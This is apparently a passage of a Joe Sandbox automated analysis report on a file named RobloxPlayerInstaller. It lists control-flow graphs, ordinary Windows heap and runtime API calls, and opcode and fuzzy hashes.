                                                                              • Instruction Fuzzy Hash: 77F0CDB1960306AFEB16FFB0D88AA7E3B74EF41750F204649F51197251CF349901DBA1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 61 125a4b0-125a4b9 62 125a4e8-125a4e9 61->62 63 125a4bb-125a4ce RtlFreeHeap 61->63 63->62 64 125a4d0-125a4e7 GetLastError call 123e5d5 call 123e672 63->64 64->62
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,01262F19,?,00000000,?,?,012631BA,?,00000007,?,?,01263665,?,?), ref: 0125A4C6
                                                                              • GetLastError.KERNEL32(?,?,01262F19,?,00000000,?,?,012631BA,?,00000007,?,?,01263665,?,?), ref: 0125A4D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 485612231-0
                                                                              • Opcode ID: 0e6bdb525ebf23abd0d1b42de9a032c3bf2a9d4abd363ce7ac5e2980463e6716
                                                                              • Instruction ID: 59540ceb94ca32379a0ce6f9c17c50596aeb918d1e658fdadc0796d1735375c2
                                                                              • Opcode Fuzzy Hash: 0e6bdb525ebf23abd0d1b42de9a032c3bf2a9d4abd363ce7ac5e2980463e6716
                                                                              • Instruction Fuzzy Hash: 7FE08C72141205AFDF312FA8F80DB9A3F68EB80692F014021FA0886060DE3485508BA0

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,01244464,0136C1C8,0000000C), ref: 0125A1C9
                                                                              • SetLastError.KERNEL32(00000000), ref: 0125A26B
                                                                                • Part of subcall function 0125B99B: RtlAllocateHeap.NTDLL(00000008,?,?,?,0125A212,00000001,00000364,?,00000006,000000FF,?,01244464,0136C1C8,0000000C), ref: 0125B9DC
                                                                                • Part of subcall function 0125A4B0: RtlFreeHeap.NTDLL(00000000,00000000,?,01262F19,?,00000000,?,?,012631BA,?,00000007,?,?,01263665,?,?), ref: 0125A4C6
                                                                                • Part of subcall function 0125A4B0: GetLastError.KERNEL32(?,?,01262F19,?,00000000,?,?,012631BA,?,00000007,?,?,01263665,?,?), ref: 0125A4D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$Heap$AllocateFree
                                                                              • String ID:
                                                                              • API String ID: 2037364846-0
                                                                              • Opcode ID: 19fea56b08cd5dd62134ccf705c0f02ba238582a699abc791d315ebdfddab429
                                                                              • Instruction ID: 0d018398e206352dc9da50d564b6dedce4894e396f7780140fd3029a9239f06c
                                                                              • Opcode Fuzzy Hash: 19fea56b08cd5dd62134ccf705c0f02ba238582a699abc791d315ebdfddab429
                                                                              • Instruction Fuzzy Hash: BC31E5717372237EE7B13B68ACC7A7A2A5C9F666A5B100320FE15D70E0EEB54C5542A0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 138 125caca-125caf2 139 125caf4-125caf6 138->139 140 125caf8-125cafa 138->140 141 125cb49-125cb4c 139->141 142 125cb00-125cb07 call 125c9ff 140->142 143 125cafc-125cafe 140->143 145 125cb0c-125cb10 142->145 143->141 146 125cb12-125cb20 GetProcAddress 145->146 147 125cb2f-125cb46 145->147 146->147 148 125cb22-125cb2d call 125381c 146->148 149 125cb48 147->149 148->149 149->141
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f1a68532e7548a964922b4dcdfb938087b9172cc9c9e143692da4ab77be74bf7
                                                                              • Instruction ID: d6c64490f967803e629b03f4fe5271fa8bc3f928ef866293acb0f5b1069fd37e
                                                                              • Opcode Fuzzy Hash: f1a68532e7548a964922b4dcdfb938087b9172cc9c9e143692da4ab77be74bf7
                                                                              • Instruction Fuzzy Hash: 1701B1376243226FEB668E6DECC596A37AEEBC57607554120FE04DB18CFA30D8609790

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 152 125b99b-125b9a6 153 125b9b4-125b9ba 152->153 154 125b9a8-125b9b2 152->154 156 125b9d3-125b9e4 RtlAllocateHeap 153->156 157 125b9bc-125b9bd 153->157 154->153 155 125b9e8-125b9f3 call 123e672 154->155 161 125b9f5-125b9f7 155->161 158 125b9e6 156->158 159 125b9bf-125b9c6 call 1259cb0 156->159 157->156 158->161 159->155 165 125b9c8-125b9d1 call 12625ed 159->165 165->155 165->156
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,?,0125A212,00000001,00000364,?,00000006,000000FF,?,01244464,0136C1C8,0000000C), ref: 0125B9DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: c44a9d9b3188628595fc3fbfc27e5107e0363062a2352d4875030ab7395b886f
                                                                              • Instruction ID: 0a2846a58f82a29b88ccf6680286c0e349321fd6fd71eff30d3e9034868f1926
                                                                              • Opcode Fuzzy Hash: c44a9d9b3188628595fc3fbfc27e5107e0363062a2352d4875030ab7395b886f
                                                                              • Instruction Fuzzy Hash: D0F0E9316752226BEBB25A6A9DC6B7B3B6EAF51671F044012EE05D6180CE30D8008FE0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 168 125a4ea-125a4f6 169 125a528-125a533 call 123e672 168->169 170 125a4f8-125a4fa 168->170 177 125a535-125a537 169->177 172 125a513-125a524 RtlAllocateHeap 170->172 173 125a4fc-125a4fd 170->173 175 125a526 172->175 176 125a4ff-125a506 call 1259cb0 172->176 173->172 175->177 176->169 180 125a508-125a511 call 12625ed 176->180 180->169 180->172
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000000,0124463C,0125A27F,?,01253C3D,0136C588,00000018,00000003), ref: 0125A51C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 5298accb8c98d3a8d7149d2afd8f81911df65b131b0ff4b5c4f1c4b3bd511a48
                                                                              • Instruction ID: ee00ea749a55c42795b0c70c9183fe27fd67e86a7296298c0659fa646a6a4be3
                                                                              • Opcode Fuzzy Hash: 5298accb8c98d3a8d7149d2afd8f81911df65b131b0ff4b5c4f1c4b3bd511a48
                                                                              • Instruction Fuzzy Hash: 47E0E5319712135BEBB126A97C86F6A3E8CEF513B5F0102209F8593080DF70C84086E1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 183 1257a3b-1257a69 call 1233198 call 1257793 187 1257a6e-1257a73 call 1233175 183->187
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3
                                                                              • String ID:
                                                                              • API String ID: 431132790-0
                                                                              • Opcode ID: 6ea0add8e4209a41040599d14ab4d10730c7130b862a756bd77a225652edf212
                                                                              • Instruction ID: 1424044aee01f0d38c9aba5a657950d0f47d88a1bf81165c0f41d7ed08ed7a78
                                                                              • Opcode Fuzzy Hash: 6ea0add8e4209a41040599d14ab4d10730c7130b862a756bd77a225652edf212
                                                                              • Instruction Fuzzy Hash: 2AE092B6C5020EAADB00DFE4C485BEFBBBCBB18301F5044669245E7140EA7897858BE1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                              • Instruction ID: 9750b96efa1c064eb4fce50cceb8b9e88c01760cd01defa33bcef89a3c8af563
                                                                              • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                              • Instruction Fuzzy Hash: FDE08C3292123CEBCB24DBDCC98499AF7ECEB44E00B114096BA01D3500D270DE00CBD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                              • Instruction ID: 2826aabbbcfacdf035e293b989aa3494b7197ed5a9ca01932dcd0571c328ac19
                                                                              • Opcode Fuzzy Hash: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                              • Instruction Fuzzy Hash: 04C08C34021D8157CF6AAB1892F43B87355AB92682FA0299CCE034B653D63E99C3D600
                                                                              APIs
                                                                              • _ValidateLocalCookies.LIBCMT ref: 01236387
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0123638F
                                                                              • _ValidateLocalCookies.LIBCMT ref: 01236418
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 01236443
                                                                              • _ValidateLocalCookies.LIBCMT ref: 01236498
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 1170836740-1018135373
                                                                              • Opcode ID: e4a8bf5ef88d9f2dd6ec09d213b71d30bb2e76f3bef5a41d5e0c14e9562a7e61
                                                                              • Instruction ID: f6fb55cdf604a27daa8585bbee0ce9134016fb537e8df4a03174729ae36b0afb
                                                                              • Opcode Fuzzy Hash: e4a8bf5ef88d9f2dd6ec09d213b71d30bb2e76f3bef5a41d5e0c14e9562a7e61
                                                                              • Instruction Fuzzy Hash: B941C8B0E2020AABCF20DF6DD884AAE7FB9EF84714F148055EE145B355D771EA51CBA0
                                                                              APIs
                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5727C2D5,?,?,00000000,0127D7FB,000000FF,?,012543A1,00000002,?,01254375,0124466F), ref: 01254403
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01254415
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,0127D7FB,000000FF,?,012543A1,00000002,?,01254375,0124466F), ref: 01254437
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: a69f135966f2d949213b6dede3394bada137f7385df847e1fbe65c05edcb03cf
                                                                              • Instruction ID: e5f7ae3f9c7b6c7df58c75029da46fd418a89b8cd88b1eb3d1fadf4f72aa4144
                                                                              • Opcode Fuzzy Hash: a69f135966f2d949213b6dede3394bada137f7385df847e1fbe65c05edcb03cf
                                                                              • Instruction Fuzzy Hash: 5101DB35554669EFDB219F54EC09FAEBFB8FB04B55F004529FD11A2690EB749900CB40